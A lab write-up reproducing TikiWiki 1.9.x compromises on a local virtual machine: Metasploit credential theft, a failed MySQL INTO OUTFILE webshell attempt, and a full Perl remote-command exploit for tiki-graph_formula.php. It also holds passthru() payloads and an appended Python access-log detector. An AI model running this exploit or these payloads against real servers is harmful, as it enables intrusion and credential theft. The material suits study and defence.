tiki-graph_formula.php code execution vulnerability reproduction (maybe ??)

1. A virtual machine image I dug up from somewhere (no idea when it landed on my disk)

Target VM image: https://

Extraction code: 1y8f

Booting it up and looking at the configuration, this thing turns out to be TikiWiki.

2. Curiosity got the better of me with something new, so I ran nikto against it and found some odd things.

I did not expect much, but the scan actually turned up a phpinfo.php, a phpMyAdmin, and what looks like a vulnerable TikiWiki.


Open msf and search for tikiwiki.

Five modules; try them one by one.

use auxiliary/admin/tikiwiki/tikidblib    # load this PoC
set RHOST <target IP>                     # target IP
show options                              # check that nothing is wrong
run                                       # attack

Attack successful? (Yes, it really worked, a bit too easy.) It hands back the database username and password, plus the database name.


Taking the password obtained from the attack over to the login, I got in successfully.

5. getshell && writing a webshell through MySQL

Since this is the root (DBA) account, I can go straight in and try writing a one-line webshell:

SELECT '' INTO OUTFILE '/var/www/tikiwiki/cmd.php';

Tried it, but it refuses to write: a "can't create file" error.



Then I intended to write it through the log-backup approach instead, and found this (as shown below):


wtf? This variable does not even exist?

Next, check whether writing files is permitted at all:

SHOW VARIABLES LIKE 'secure_file_priv';



Source: https://

So writing is supposed to be allowed, but then why the hell does it fail? (An empty secure_file_priv only lifts the MySQL-side restriction; a "can't create file" error comes from the operating system, typically because the mysqld process user has no write permission on the target directory or a MAC profile such as AppArmor denies it.)


5. Getting desperate

Also tried the phpMyAdmin 3.0 vulnerability (exploit/unix/webapp/phpmyadmin_config), to no avail.

Back to the nikto scan results.


Here it plainly says that code injection is possible, demonstrated with phpinfo().

After a long time digging through Baidu: the problem lies in tiki-graph_formula.php, and there is an exp for it.


Skimmed through it.



It appears to execute the command through passthru().

Full exp:

Link: https://

# TikiWiki <= 1.9.8 Remote Command Execution Exploit
# Description
# -----------
# TikiWiki contains a flaw that may allow a remote attacker to execute arbitrary commands. 
# The issue is due to 'tiki-graph_formula.php' script not properly sanitizing user input 
# supplied to the f variable, which may allow a remote attacker to execute arbitrary PHP 
# commands resulting in a loss of integrity.
# -----------
# Vulnerability discovered by ShAnKaR 
# $Id:,v 0.1 2007/10/12 13:25:08 str0ke Exp $

use strict;
use LWP::UserAgent;

my $target = shift || &usage();
my $proxy = shift;
my $command;

# first request: read the database configuration file
&exploit($target, "cat db/local.php", $proxy);

print "[?] php shell it?\n";
print "[*] wget -O backups/shell.php\n";
print "[*] lynx " . $target . "/backups/shell.php\n\n";

# interactive loop: every line typed is sent as one command, an empty line quits
while (1) {
	print "tiki\# ";
	chomp($command = <STDIN>);
	exit unless $command;
	&exploit($target, $command, $proxy);
}

sub usage() {
	print "[?] TikiWiki <= 1.9.8 Remote Command Execution Exploit\n";
	print "[?] str0ke \n";
	print "[?] usage: perl $0 [target]\n";
	print "    [target] (ex.\n";
	print "    [proxy] (ex.\n";
	exit;
}

sub exploit() {
	my($target, $command, $proxy) = @_;

	# wrap the command in markers so its output can be cut out of the page returned
	my $cmd = 'echo start_er;'.$command.';'.'echo end_er';
	# encode the command as chr(n).chr(n)... so it is a bare PHP expression (no quotes) inside f[]
	my $byte = join('.', map { $_ = 'chr('.$_.')' } unpack('C*', $cmd));

	my $conn = LWP::UserAgent->new() or die;
	$conn->agent("Mozilla/4.0 (compatible; Lotus-Notes/5.0; Windows-NT)");
	$conn->proxy("http", "http://".$proxy."/") unless !$proxy;
	my $out=$conn->get($target."/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.passthru($byte).die()&t=png&title=");

	if ($out->content =~ m/start_er(.*?)end_er/ms) {
		print $1 . "\n";
	} else { 
		print "[-] Exploit Failed\n";
	}
}

# [2007-10-12]


The code execution vulnerability is confirmed, so next tweak the f parameter of the payload: f[]=x.tan.passthru('whoami').die()&t=png&title=



One problem is that only a single command can be executed this way, and it goes in as a request parameter, so I think the command should be turned into a byte stream first (which is roughly what the exp does with its chr() encoding).

Finally, as a supplement: I found this module in msf as well.
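From the defender's side, the tell-tale for this bug is an f[] value that is not a math formula at all. As an added example (not code from the original post or from the exploit's author), the following parses Apache access-log lines, pulls the f[] parameter out of tiki-graph_formula.php requests, and flags identifiers that are not math names; the log lines and the allowlist of math functions are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample Apache access-log lines (not from the original post):
# a chr()-encoded exploit request, a benign plot, and a percent-encoded exploit request.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Oct/2017:13:25:08 +0800] "GET /tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.passthru(chr(119).chr(104).chr(111).chr(97).chr(109).chr(105)).die()&t=png&title= HTTP/1.1" 200 512 "-" "Mozilla/4.0 (compatible; Lotus-Notes/5.0; Windows-NT)"
10.0.0.7 - - [12/Oct/2017:13:26:01 +0800] "GET /tiki-graph_formula.php?w=400&h=300&s=1&min=-5&max=5&f[]=sin(x)%2Bcos(x)&t=png&title=waves HTTP/1.1" 200 1043 "-" "Mozilla/5.0"
10.0.0.5 - - [12/Oct/2017:13:27:44 +0800] "GET /tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f%5B%5D=x.tan.passthru%28%27whoami%27%29.die%28%29&t=png&title= HTTP/1.1" 200 98 "-" "curl/7.58.0"
"""

# Identifiers a legitimate formula may contain (an assumption for this example;
# adjust it to the math functions your TikiWiki version actually offers).
ALLOWED_IDENTS = {"x", "sin", "cos", "tan", "exp", "log", "sqrt", "abs", "pi", "e"}

# Common log format prefix: client IP, identity, user, timestamp, then the request line.
REQ_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/')
IDENT_RE = re.compile(r"[A-Za-z_]\w*")

def check_formula(formula):
    """Return the identifiers in a formula value that are not math names,
    i.e. the tokens the exploit needs (passthru, chr, die, ...)."""
    return {tok for tok in IDENT_RE.findall(formula) if tok.lower() not in ALLOWED_IDENTS}

def scan_access_log(text):
    """One finding per request to tiki-graph_formula.php whose f[] value
    contains non-math identifiers or string/statement syntax."""
    findings = []
    for line in text.splitlines():
        m = REQ_RE.match(line)
        if not m:
            continue
        src, url = m.groups()
        parts = urlsplit(url)
        if not parts.path.endswith("/tiki-graph_formula.php"):
            continue
        # parse_qs percent-decodes keys and values, so f%5B%5D is seen as f[]
        for formula in parse_qs(parts.query).get("f[]", []):
            bad = check_formula(formula)
            if bad or re.search(r"""['";]""", formula):
                findings.append({"src": src, "formula": formula,
                                 "bad_idents": sorted(bad)})
    return findings

if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f["src"], "->", f["formula"], "| suspicious:", ", ".join(f["bad_idents"]))
```

The same check applied at request time (reject any f[] value that fails check_formula) is the input validation the vulnerable script lacked.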

Matching Modules

   #  Name                                             Disclosure Date  Rank       Check  Description
   -  ----                                             ---------------  ----       -----  -----------
   0  exploit/unix/webapp/tikiwiki_graph_formula_exec  2007-10-10       excellent  Yes    TikiWiki tiki-graph_formula Remote PHP Code Execution
